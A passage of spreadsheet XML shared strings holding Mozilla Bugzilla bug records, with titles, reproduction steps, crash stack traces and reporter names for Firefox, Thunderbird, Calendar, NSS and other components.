  <si>
    <t>in bug 186482 comment 1 hixie said that the component editor didn't support
autocomplete. it should :)</t>
  </si>
  <si>
    <t>CALENDAR-360117</t>
  </si>
  <si>
    <t>prototype event dialog : autoexpand freebusy-grid</t>
  </si>
  <si>
    <t>currently the free/busy-grid displays the set of working hours only. in case an event is displayed that happens to be scheduled outside those hours a small thin selection-bar remains but the full range of the appointment can't be displayed. in such a case the time-bar and the grid should automatically expand and display the whole range of 24 hours.</t>
  </si>
  <si>
    <t>michael.buettner</t>
  </si>
  <si>
    <t>MOZILLA_LABS-495290</t>
  </si>
  <si>
    <t>Provide a way to hook into the runtime unloading</t>
  </si>
  <si>
    <t>Right now JetpackRuntime only unloads jetpacks on unload but other things might want to know when everything is going away.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-489672</t>
  </si>
  <si>
    <t>Talos reboots (20090422 edition)</t>
  </si>
  <si>
    <t>qm-pxp-slave01 (let's give this machine one last chance before replacing it...)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-186977</t>
  </si>
  <si>
    <t>Message folder pane shows folder size in MB but also in kb (all lowercase)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20021227
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20021227
With bug 173825 a message folder size column was introduced to the folder pane.
Depending on the size of each folder it shows kb or MB. In that other bug
there is no obvious reason why a lowercase b is used for the unit Bytes. So
I think this was an accidental slip and it should be changed to KB.
Four reasons why I think this should be changed:
- It looks odd (see screenshot I'll attach)
- It is the same unit so why use different case?
- b is often used for bits not bytes but from the source I see here it
means bytes
- From lxr I see Mozilla always uses KB for kilobytes (e.g. in the message
pane where the user sees it simultaneously which is even more confusing...) so
it should be used here also for consistency.
(The uppercase K (used everywhere else) should be ok here because it stands
for a factor 1024 (as usual): there is a distinction (that at least some make)
between K for 1024 and (defined by the metric system) k for 1000.)
Although this bug is visible at the front end I chose the back end component
because the affected code seems to be pretty far inside mail. Feel free to
change if I'm wrong...
Reproducible: Always
Steps to Reproduce:
1. Open mail window with some big (&gt; 1 MB) and some small (&lt; 1 MB) message
folders visible
2. Make sure the Size column is shown in the folder pane (the left one)
Actual Results:  
Folder size is shown in kb and MB.
Expected Results:  
Folder size should be shown in KB and MB.</t>
  </si>
  <si>
    <t>durbacher</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-249882</t>
  </si>
  <si>
    <t>Composition</t>
  </si>
  <si>
    <t>after forward as inline with body style the next new message gets the body style (cached compose)</t>
  </si>
  <si>
    <t>after fwd as line a particular message the cached compose window gets tainted.
thanks to chris h. and dveditz for figuring this one out.
someone sent chris h. an email which used a background from some adware from
hotbar.com.
when you use mozilla or tbird to do a fwd-line the background gets included.
later when you compose you next new message that uses the same compose window
that you used for the fwd-inline you get the same background.
it sounds likes some style (or body attribute?) is persisting in the cached
compose window.
investigating...</t>
  </si>
  <si>
    <t>CORE-443017</t>
  </si>
  <si>
    <t>Networking: Cache</t>
  </si>
  <si>
    <t>Create tests for new application cache stuff</t>
  </si>
  <si>
    <t>Created attachment 327668
First simple tests
New tests for:
- opportunistic caching
- whitelisting
- foreign marking
- fallbacks
We will need to find out how to modify manifest files to test updates and swapCache. Also I am not sure how to do testing of fallback for images probably introduce a kind of reftesting to mochitest or wait for bug 430652 to land.</t>
  </si>
  <si>
    <t>BUGZILLA-169055</t>
  </si>
  <si>
    <t>review: Document CheckCanChangeField so sites can modify it for local needs Patch v.1</t>
  </si>
  <si>
    <t>Gervase Markham  has requested review for bug #168804:
Document CheckCanChangeField so sites can modify it for local needs attachment
#99299: Patch v.1.
http://bugzilla.mozilla.org/attachment.cgi?id=99299&amp;action=edit
Additional Comments from Requester:
Given that you've expressed an interest in what we do in this area could you
please have a look at this? As I say in the bug I think this makes things
better for right now.</t>
  </si>
  <si>
    <t>matty_is_a_geek</t>
  </si>
  <si>
    <t>TOOLKIT-321481</t>
  </si>
  <si>
    <t>[Trunk] Gmail - phrase not found - even though it is (find bar updating incorrectly)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051225 Firefox/1.6a1 ID:2005122501
1.Open Gmail any mail
2.open Find bar and type a word you see a few times in the mail
3.Press Highlight all
result:
- all the matches are correctly highlighted 
- the findbar turns red and the phrase not found message is displayed
expected:
- don't tell me the phrase isn't found.</t>
  </si>
  <si>
    <t>peter.vanderwoude</t>
  </si>
  <si>
    <t>FIREFOX-306072</t>
  </si>
  <si>
    <t>No label for find textbox in findbar</t>
  </si>
  <si>
    <t>Press Ctrl+F. The focus goes to a textbox with no accessible name because the
label does not use the control attribute. Bad. Naughty.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-303359</t>
  </si>
  <si>
    <t>Pasting a bookmark in the Bookmarks Bar collection results in the bookmark in the Bookmarks Menu collection</t>
  </si>
  <si>
    <t>If you paste a bookmark (from another collection a folder etc.) in the the
Bookmarks Bar collection without selecting any item in the BM Bar collection
the bookmark actually appears in the Bookmarks Menu collection.
Workaround: select a bookmark before hitting paste then manually move the
pasted bookmark to the actual position you desire it to occupy.</t>
  </si>
  <si>
    <t>FIREFOX-346522</t>
  </si>
  <si>
    <t>can't valid choices in option menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
i use a french version of firefox and the new version updated yesterday and i now can't valid my choices in the option menu the ok button seems doing nothing. and i think it's for the same reason i can't use my personals themes(downloaded from the firefox's website). i'm sorry my english isn't good i hope you understood the problem.
you do a great job with firefox!! thanks.
Reproducible: Always
Steps to Reproduce:
1.french Outils ( Tools )
2.Options
3.change something(homepage for me) and the ok button just move but don't respond
Actual Results:  
changes are not save and i can't change my themes
Expected Results:  
choose my home page and try one of your beautifull theme
nothing...</t>
  </si>
  <si>
    <t>t_ravilly</t>
  </si>
  <si>
    <t>TOOLKIT-386482</t>
  </si>
  <si>
    <t>Add a setter for richlistitem.searchLabel</t>
  </si>
  <si>
    <t>(to conform to expectations due to similar properties and to the foresightful documentation)</t>
  </si>
  <si>
    <t>TOOLKIT-217018</t>
  </si>
  <si>
    <t>[pwd-mngr] Password incorrectly stored</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
The login page of DR (http://drhome.digitalriver.com/live/login/ec_login.htm)
has a password and username field for login.
Firebird offers to remember this information. My login is 4 characters big with
a password much longer than that
However when I come back Firebird fills in the fields with the right login
name and a password of the same length as the login name.
Reproducible: Always
Steps to Reproduce:
1. Remove all passwords and set a bookmark to
(http://drhome.digitalriver.com/live/login/ec_login.htm
)
2. login to webpage via bookmark
3. enter username and password (make sure not of same length)
4. accept that firebird remembers this login info
5. click on bookmark again
Actual Results:  
Password is 4 characters long the length of the username. If I try to login
again I see:
Sorry! Login failed! Please check your typing and try again.
Expected Results:  
Enter the proper password for that login.
Form filler works fine with other websites. This works well in IE.</t>
  </si>
  <si>
    <t>m_laverd</t>
  </si>
  <si>
    <t>CORE-437174</t>
  </si>
  <si>
    <t>Disabling 3rd party cookies breaks sending cookies for channels with no docshell</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9) Gecko/2008051206 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9) Gecko/2008051206 Firefox/3.0
If 3rd party cookies are disabled ALL experimental add-ons (themes + extensions) in the sand-box at addons.mozilla.org produce an error and do not install.
Adding *.mozilla.org* to cookie allow exceptions did not fix.
AFAIK there is NO other way of installing these plugins ('save-as' tricks don't work) unless 3rd party cookies are enabled or the xpi can be obtained from a alternate location.
Reproducible: Always
Steps to Reproduce:
1. Disable 3rd party cookies: either untick Accept third-party cookies or change 'network.cookie.cookieBehavior' to 1
2. Log-in to addons.mozilla.org to enable downloading of experimental sand-box add-ons.
3. Click 'Add To Firefox' on an experimental add-on.
Actual Results:  
Firefox could not install the file at
https://addons.mozilla.org/... .xpi
because: Invalid file hash (possible download corruption)
-261
Expected Results:  
correct retrival of file + installation
Reproducable on a clean/fresh profile.</t>
  </si>
  <si>
    <t>mcs</t>
  </si>
  <si>
    <t>nonamo</t>
  </si>
  <si>
    <t>CORE-67723</t>
  </si>
  <si>
    <t>crash whenever popping up second browser window in viewer (nsDocShellTreeOwner::IsModal)</t>
  </si>
  <si>
    <t>running on WinNT 4.0 today's debug build pulled around noon pst.
viewer crashes every time a site tries to pop up an ad window.  This prevents us
from running layout regression tests (and probably various daily performance
metrics that only run in viewer.) We can't check in until we can at least run
through the top100.
nsDocShellTreeOwner::IsModal(nsDocShellTreeOwner * const 0x011ec620 int *
0x0012e45c) line 236 + 16 bytes
GlobalWindowImpl::OpenInternal(GlobalWindowImpl * const 0x02afd050 JSContext *
0x02b01180 long * 0x00e7d600 unsigned int 3 int 0 nsIDOMWindowInternal * *
0x0012e8b8) line 3064
GlobalWindowImpl::Open(GlobalWindowImpl * const 0x02afd054 JSContext *
0x02b01180 long * 0x00e7d600 unsigned int 3 nsIDOMWindowInternal * *
0x0012e8b8) line 2069
WindowInternalOpen(JSContext * 0x02b01180 JSObject * 0x00daac28 unsigned int
3 long * 0x00e7d600 long * 0x0012e99c) line 4383 + 42 bytes
js_Invoke(JSContext * 0x02b01180 unsigned int 3 unsigned int 0) line 777 + 23
bytes
js_Interpret(JSContext * 0x02b01180 long * 0x0012f838) line 2670 + 15 bytes
js_Execute(JSContext * 0x02b01180 JSObject * 0x00daac28 JSScript * 0x032d0c80
JSStackFrame * 0x00000000 unsigned int 0 long * 0x0012f838) line 956 + 13 bytes
JS_EvaluateUCScriptForPrincipals(JSContext * 0x02b01180 JSObject * 0x00daac28
JSPrincipals * 0x0327f050 const unsigned short * 0x00f16290 unsigned int
17696 const char * 0x0327f170 unsigned int 1 long * 0x0012f838) line 3224 +
25 bytes
nsJSContext::EvaluateString(nsJSContext * const 0x02b006b0 const
basic_nsAReadableString &amp; {...} void * 0x00daac28 nsIPrincipal
* 0x0327f04c const char * 0x0327f170 unsigned int 1 const char * 0x005125f8
basic_nsAWritableString &amp; {...} int * 0x0012f894) line 609 + 68
bytes
HTMLContentSink::EvaluateScript(nsString &amp; {...} nsIURI * 0x032b6510 int 1
const char * 0x005125f8) line 4689
HTMLContentSink::OnStreamComplete(HTMLContentSink * const 0x032ce984
nsIStreamLoader * 0x032b6050 nsISupports * 0x00000000 unsigned int 0 unsigned
int 17696 const char * 0x00f0e248) line 4811 + 42 bytes
nsStreamLoader::OnStopRequest(nsStreamLoader * const 0x032b6054 nsIChannel *
0x032b5d40 nsISupports * 0x00000000 unsigned int 0 const unsigned short *
0x002df048 gCommonEmptyBuffer) line 121 + 78 bytes
nsHTTPFinalListener::OnStopRequest(nsHTTPFinalListener * const 0x032b1750
nsIChannel * 0x032b5d40 nsISupports * 0x00000000 unsigned int 0 const
unsigned short * 0x002df048 gCommonEmptyBuffer) line 1182 + 42 bytes
InterceptStreamListener::OnStopRequest(InterceptStreamListener * const
0x032a8680 nsIChannel * 0x032b5d40 nsISupports * 0x00000000 unsigned int 0
const unsigned short * 0x002df048 gCommonEmptyBuffer) line 1212
nsHTTPChannel::ResponseCompleted(nsIStreamListener * 0x032a8680 unsigned int 0
const unsigned short * 0x002df048 gCommonEmptyBuffer) line 1930 + 42 bytes
nsHTTPServerListener::OnStopRequest(nsHTTPServerListener * const 0x032aa7f0
nsIChannel * 0x032b1084 nsISupports * 0x032b5d40 unsigned int 0 const
unsigned short * 0x002df048 gCommonEmptyBuffer) line 735
nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x032786b0) line
177 + 67 bytes
nsStreamObserverEvent::HandlePLEvent(PLEvent * 0x032786b4) line 78
PL_HandleEvent(PLEvent * 0x032786b4) line 576 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x011ea930) line 509 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x04ac05a2 unsigned int 49394 unsigned int 0
long 18786608) line 1054 + 9 bytes
USER32! 77e71820()</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-246424</t>
  </si>
  <si>
    <t>tooltip obscures described prefs object</t>
  </si>
  <si>
    <t>Tested only 0.9.64 in xft/gtk2 SuSE Linux 9.1 release Mozilla/5.0 (X11 U Linux
i586 en-US rv:1.6) Gecko/20040114
To reproduce:
1-open prefs
2-place mouse pointer over an object
Actual behavior:
1-Tootip renders too high obscuring the bottom portion of the object it
describes. Problem is slightly less (~5%) at 96 DPI slightly more at 120 DPI.
Expected behavior:
1-tooltip is fully below object it describes.</t>
  </si>
  <si>
    <t>CORE-185113</t>
  </si>
  <si>
    <t>XPCOM uses the wrong GRE define tag</t>
  </si>
  <si>
    <t>XPCOM uses the wrong GRE define tag when looking for the components directory.</t>
  </si>
  <si>
    <t>TESTOPIA-487714</t>
  </si>
  <si>
    <t>Can't view report from report link</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
I created a dashboard chart and then generated and copied a link to the chart.
When I tried to view the chart from the link I got an error in Bugzilla
stating the chart format does not exist with a content type of html.
Clone of bug 458759
Reproducible: Always
Steps to Reproduce:
1. Create a Dashboard report chart. I did Test Run report and Test Results
report with Status on the vertical axis and category on the horizontal axis. I
tried table line and bar charts.
2. Create a link to the report and copy it.
3. Paste the link in a new browser or add the link to a dashboard.
4. Save the report.
5. Attempt to view the report from the saved search tab.
Actual Results:  
3. An error appears in bugzilla stating The requested format bar does not
exist with a content type of html. It did the same for bar table and line.
4. Get a Testopia error stating There must have been a problem saving this
search. I can't find a type.
Expected Results:  
3. Should be able to view the chart from the link.
4. Should be able to view the chart from the saved search.
This was fixed in previous versions of Testopia but appears to have crept back in to Testopia 2.2.
Marking as higher because I need a way to save and link to these reports for
test reporting and status purposes.
The link icon is referencing the incorrect cgi file. When you click to make a link the URL generated contains a list*.cgi file. The URLs should contain the following CGI files:
tr_plan_reports.cgi
tr_case_reports.cgi
tr_run_reports.cgi
tr_caserun_reports.cgi
I can work around the problem by manually replacing the incorrect cgi file with
the correct one.</t>
  </si>
  <si>
    <t>kballard</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-391216</t>
  </si>
  <si>
    <t>tag italian relnotes for production</t>
  </si>
  <si>
    <t>Please tag the Italian release notes for production (wording change) :
SVN revision 5609
firefox\2.0.0.6\whatsnew\index.html 
Thanks</t>
  </si>
  <si>
    <t>CORE-386607</t>
  </si>
  <si>
    <t>Fix Mac 1.8 branch regression from bug 344228</t>
  </si>
  <si>
    <t>This bug is to track landing the regression fix for bug 344228 on the 1.8 branches. The patch is attached to the original bug.</t>
  </si>
  <si>
    <t>CORE-181233</t>
  </si>
  <si>
    <t>[gtk2] nsEvent::time need to be set for key event</t>
  </si>
  <si>
    <t>other function such as keyboard incremental navigation needs this and it's 
available in gtk1.2.</t>
  </si>
  <si>
    <t>CORE-208184</t>
  </si>
  <si>
    <t>hangs on attempt to load the URL given above</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
The page http://openmathtag.sourceforge.net/OMT_demo_interactive.php loads just
fine in Mozilla Browser but Firebird hungs trying to load it.
I tried it several times on two computers so it gotta be easily reprodycible bug.
Reproducible: Always
Steps to Reproduce:
1. Visit http://openmathtag.sourceforge.net/OMT_demo_interactive.php
2.
3.
Actual Results:  
Firebitrd hungs the tab with page does not even rotate the loading icon
windows classifies Firebird as [Not Responding] application.
Expected Results:  
Show page correctly like full Mozilla browser does.</t>
  </si>
  <si>
    <t>CORE-452787</t>
  </si>
  <si>
    <t>Couldn't drag elements which contain text or it is difficult for empty elements</t>
  </si>
  <si>
    <t>Created attachment 336052
HTML page which shows the bug
With the new HTML5 drag and drop API I found an issue: 
- if a div is draggable the drag cannot start if it contains text.
- If it is empty we should first click on it (by pushing and releasing the mouse button) and then we can begin a drag.
- If the div have the -moz-user-select:none all works as expected.
Look at the given html page to see this behaviors.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-429529</t>
  </si>
  <si>
    <t>Do not calculate page ranks every time /tiki-wiki_rankings.php is loaded</t>
  </si>
  <si>
    <t>This page is linked from the homepage.  The pagerank calculation queries are bringing the database to its knees.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-179361</t>
  </si>
  <si>
    <t>fix shutdown leaks in gtk port</t>
  </si>
  <si>
    <t>I have a fix for a bunch of one-time leaks in the GTK port.  Not that useful
but less noise in the leak stats and useful if someone embeds Mozilla for part
of the lifetime of an app (or for some fixes restarts it in-process).
These need a little cleaning up still and I need to do a little more testing
on some of them that they're really correct.</t>
  </si>
  <si>
    <t>CORE-510035</t>
  </si>
  <si>
    <t>Java applet does not load on Mac OS X in anything built on 1.9.3</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a2pre) Gecko/20090812 Minefield/3.6a2pre
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a2pre) Gecko/20090812 Minefield/3.6a2pre
Java applets will not load on Mac OS X (10.5.8).
Reproducible: Always
Steps to Reproduce:
1.Visit http://www.jigzone.com/puzzles/daily-jigsaw or https://www2.bancobrasil.com.br/aapf/login.jsp
2.
3.
Actual Results:  
First site example does lot load a puzzle game shows a box with error text: Oopsthe puzzle has failed to start in a reasonable time. This could happen if your are no longer connected to the internet or your computer has problems displaying Java applets.
Second site does not load virtual keyboard to input password (online banking)
Expected Results:  
The first site should load a puzzle game and the second site should load a virtual keyboard to users can input password.
Works on release 3.5.2</t>
  </si>
  <si>
    <t>brassen</t>
  </si>
  <si>
    <t>CORE-323669</t>
  </si>
  <si>
    <t>Percent attribute values in userSpace gradients don't work</t>
  </si>
  <si>
    <t>The attached example which has a userspace radial gradient without a radius specified (and thus gets the default value of 50%) doesn't draw properly.  This is due to CairoRadialGradient getting a value of 0.5 back from GetR() and handing this off to cairo.</t>
  </si>
  <si>
    <t>CORE-373122</t>
  </si>
  <si>
    <t>Crash and/or Cocoa exception with Flash overflow: scroll and display: -moz-box</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load the testcase and let it reload a few times.  (It will reload faster if it's local.)
Result:
firefox-bin[8985] *** NSRunLoop ignoring exception '*** -[NSCFArray objectAtIndex:]: index (6) beyond bounds (6)' that raised during posting of delayed perform with target 34b4a950 and selector 'runAppShell'
(this should be considered a crash see bug 340453)
and Firefox stops painting.
OR
Firefox crashes with a sg:critical-looking stack.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-391787</t>
  </si>
  <si>
    <t>Install win32 buildbot slave VM on production-pacifica-vm</t>
  </si>
  <si>
    <t>Once hardware is up and running install buildbot slave connecting to build
master on build-console.build.mozilla.org</t>
  </si>
  <si>
    <t>CORE-480844</t>
  </si>
  <si>
    <t>font-variant:small-caps doesn't work with SVG</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
The property 'font-variant:small-caps' doesn't work as either a CSS property or an attribute with text in SVG
Reproducible: Always
Steps to Reproduce:
1. Create an SVG file with a  element
2. Set an attribute or property on that element for 'font-variant:small-caps'
3. Sigh disappointedly
Actual Results:  
Font appears as normal text without small-caps.
Expected Results:  
Font should use small-caps.
 This is a test </t>
  </si>
  <si>
    <t>CORE-193316</t>
  </si>
  <si>
    <t>Caret and thus focus not visible in readonly text field</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.5 Windows NT 5.0)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030210
When the attached page is viewed the focus marker (the I-bar/cursor) 
disappears. The problem is the inputElement.readOnly = true statement. If 
this is removed then it works.
Even though the I-bar disappears text is still entered the right place.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>jln</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-115690</t>
  </si>
  <si>
    <t>clean up tinderbox script for win32 perf tests (gmake build)</t>
  </si>
  <si>
    <t>We need to start working on getting perf tests hooked up to windows machines.
mcafee said that tinderbox script for windows has bit-rotted...   :-(  so it
needs work.  He will need to do a re-write in order to get it into the shape
linux script is.  
(linux script has a lot of unix specific stuff therefore it is not sharable)</t>
  </si>
  <si>
    <t>cathleennscp</t>
  </si>
  <si>
    <t>FIREFOX-891116</t>
  </si>
  <si>
    <t>Click-to-play permissions set in private browsing stay around after exiting private browsing (privacy leak)</t>
  </si>
  <si>
    <t>STR:
Go to Youtube.com
Set a site permission for Flash to Always Ask to be run
Enter private browsing
Try to play a video note that you have to choose either Allow Now or Allow and Remember
Choose one of the options
Exit private browsing mode
Expected:
Permissions changes during pb mode will not be remembered
Actual:
They are remembered and persisted.
This is a regression from the previous CTP implementation in that there is no run once setting. Both options will persist now.</t>
  </si>
  <si>
    <t>past</t>
  </si>
  <si>
    <t>jaws</t>
  </si>
  <si>
    <t>CORE-470978</t>
  </si>
  <si>
    <t>Hang [@ nsSplittableFrame::GetPrevInFlow] on print preview with table cell with large height</t>
  </si>
  <si>
    <t>Created attachment 354336
testcase
I seem to hang in this case when using a table cell with a large height.
I don't hang with it in Firefox 2 so it seems like a regression.
Stack of debug build of hang:
&gt;	gklayout.dll!nsSplittableFrame::GetPrevInFlow()  Line 155 + 0x1f bytes	C++
 	gklayout.dll!nsSplittableFrame::GetFirstInFlow()  Line 186 + 0x8 bytes	C++
 	gklayout.dll!nsHTMLReflowState::InitResizeFlags(nsPresContext * aPresContext=0x042ab3a0)  Line 373 + 0x4c bytes	C++
 	gklayout.dll!nsHTMLReflowState::Init(nsPresContext * aPresContext=0x042ab3a0 int aContainingBlockWidth=-1 int aContainingBlockHeight=-1 const nsMargin * aBorder=0x00000000 const nsMargin * aPadding=0x00000000)  Line 296	C++
 	gklayout.dll!nsTableRowFrame::InitChildReflowState(nsPresContext &amp; aPresContext={...} const nsSize &amp; aAvailSize={...} int aBorderCollapse=0 nsTableCellReflowState &amp; aReflowState={...})  Line 106	C++
 	gklayout.dll!nsTableRowFrame::ReflowChildren(nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} const nsHTMLReflowState &amp; aReflowState={...} nsTableFrame &amp; aTableFrame={...} unsigned int &amp; aStatus=0)  Line 916	C++
 	gklayout.dll!nsTableRowFrame::Reflow(nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} const nsHTMLReflowState &amp; aReflowState={...} unsigned int &amp; aStatus=0)  Line 1074 + 0x25 bytes	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x0527266c nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} const nsHTMLReflowState &amp; aReflowState={...} int aX=0 int aY=0 unsigned int aFlags=16 unsigned int &amp; aStatus=0 nsOverflowContinuationTracker * aTracker=0x00000000)  Line 793 + 0x21 bytes	C++
 	gklayout.dll!nsTableRowGroupFrame::ReflowChildren(nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} nsRowGroupReflowState &amp; aReflowState={...} unsigned int &amp; aStatus=0 int * aPageBreakBeforeEnd=0x0012b614)  Line 436 + 0x2c bytes	C++
 	gklayout.dll!nsTableRowGroupFrame::Reflow(nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} const nsHTMLReflowState &amp; aReflowState={...} unsigned int &amp; aStatus=0)  Line 1336 + 0x1d bytes	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x05272770 nsPresContext * aPresContext=0x042ab3a0 nsHTMLReflowMetrics &amp; aDesiredSize={...} const nsHTMLReflowState &amp; aReflowState={...} int aX=0 int aY=0 unsigned int aFlags=16 unsigned int &amp; aStatus=0 nsOverflowContinuationTracker * aTracker=0x00000000)  Line 793 + 0x21 bytes	C++
etc...</t>
  </si>
  <si>
    <t>TOOLKIT-246417</t>
  </si>
  <si>
    <t>Statusbar/Advanced Options software updater fails even if extension update exists</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040611 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040611 Firefox/0.8.0+
When double-clicking on the update section in the status bar Firefox always
gives the message Firefox encountered problems when trying to find updates for
some items clicking the details button lists all extensions. This happens
regardless of whether an update actually exisits. However selecting an extension
in the Extension Manager and pressing Update will successfully find an update
(assuming one is available).
Reproducible: Always
Steps to Reproduce:
1. Install the extension at the URL (or another one with an update available).
2. Double-click the update area in the status bar.
Actual Results:  
Firefox reports Firefox encountered problems when trying to find updates for
some items and lists all extensions in the details box (including those with
updates available).
Expected Results:  
Firefox should have listed the available updates.
According to Ethereal Firefox successfully fetches the extension's update file
(http://www.pikey.me.uk/mozilla/test/updatetest.rdf) and attempts to fetch
http://update.mozilla.org/update.rdf (which 404s).
Not sure if this is covered by Bug 245953 so I filed a separate bug.</t>
  </si>
  <si>
    <t>CORE-136756</t>
  </si>
  <si>
    <t>String</t>
  </si>
  <si>
    <t>Strings requires unfrozen nsCRT class</t>
  </si>
  <si>
    <t>Strings requiring unfrozen the nsCRT class is a problem for components plugins
and embedders that want to work in or with multiple version of mozilla and not
have to reimplement the string code.  The idea is to have these clients link in
the string code so that they can have a snapshot of our string implementation.
 This allows the freedom to change the string classes in mozilla without worring
about backwards compatibly (assuming that no interfaces changes - string
interfaces are (or will be) frozen right!).  Basically the clients get a copy
of the concrete implementation of the string interfaces.
Having string require this unfrozen class will cause problems when nsCRT
changes.  Any change could break compatiblity with built clients.</t>
  </si>
  <si>
    <t>CORE-425367</t>
  </si>
  <si>
    <t>Support for stretchy fences built from glyphs in SymbolMT</t>
  </si>
  <si>
    <t>Created attachment 311996
Current Windows XP rendering with default fonts
MS Windows XP has little Unicode font support for stretchy fences (brackets).
The Monotype Symbol font has some useful glyphs for building these characters
and with bug 399636 now fixed we can easily access these glyphs from the PUA
without the font getting in the way of Unicode characters.
The lack of SymbolMT support is a regression.  Mozilla 1.8 handled this
font through font-specific encoding conversions.
Mac has a Unicode Symbol font and so doesn't need any special support.
We shouldn't make any assumptions about the encoding of a font with family
name Symbol on Unix because there exist Adobe Monotype and Apple fonts all
with family name Symbol but each of them uses different encodings.
Linux doesn't need to use any Symbol font because most Linux systems have
DejaVu Sans and Standard Symbols L which provide (at least) the same
functionality.</t>
  </si>
  <si>
    <t>NSS-354423</t>
  </si>
  <si>
    <t>modutil -changepw command crashes in debug builds</t>
  </si>
  <si>
    <t>The reason for the crash is this:
746     if(newpw) {
747         memset(newpw 0 strlen(newpw))
748         PORT_Free(newpw)
749     }
750     if(newpw2) {
751         memset(newpw2 0 strlen(newpw))
                                         ^^
should be newpw2
752         PORT_Free(newpw2)
753     }
The patch is to insert the digit 2 in line 751.
Can I get a review on that patch here?</t>
  </si>
  <si>
    <t>CORE-116302</t>
  </si>
  <si>
    <t>ffgurus.net Sections on webpages not downloading in full</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible MSIE 6.0 AOL 7.0 Windows NT 5.1 Q312461)
BuildID:    2001121909
Upon arriving on http://www.ffgurus.net/ I clicked on the Final Fantasy VII 
section which the URL is http://www.ffgurus.net/ff7/
when transfered to that page parts of the center and the entire white side were 
white. The status bar said done but the page is supposed to be in black.
The same thing occured on two other sections of that same website. The section 
URL's are http://www.ffgurus.net/ff10/ and http://www.ffgurus.net/ff11/
I inserted the URL's one at a time into my AOL browser location bar and the 
problems did not occur. 
Other URL's which display this same problem are http://www.megadeth.com/ this 
is seen at the top right corner of the page and on 
http://www.stillmatic.com/main.html the white mark appears
next to a chain like scroll bar on the page. It seems none of the images except 
for the navigation and the sky done in flash appear on this site.
Reproducible: Always
Steps to Reproduce:
1. Goto http://www.ffgurus.net/
2. Click on the Final Fantasy VII wait for it to finish loading then hit the 
back arrow key section the Final Fantasy X section hit the back arrow key 
after it finishes loading and then finally the Final Fantasy XI section then 
back arrow key after it's finished downloading.
3. Now if possible go to http://www.megadeth.com/ and 
http://www.stillmatic.com/main.html please confirm that the white color is 
appearing on the webpages and also for the FFGurus site and the Stillmatic site 
don't download all the images.
Actual Results:  The content for the pages noted wouldn't display properly at 
all even when hitting the F5 button or refreshing it.
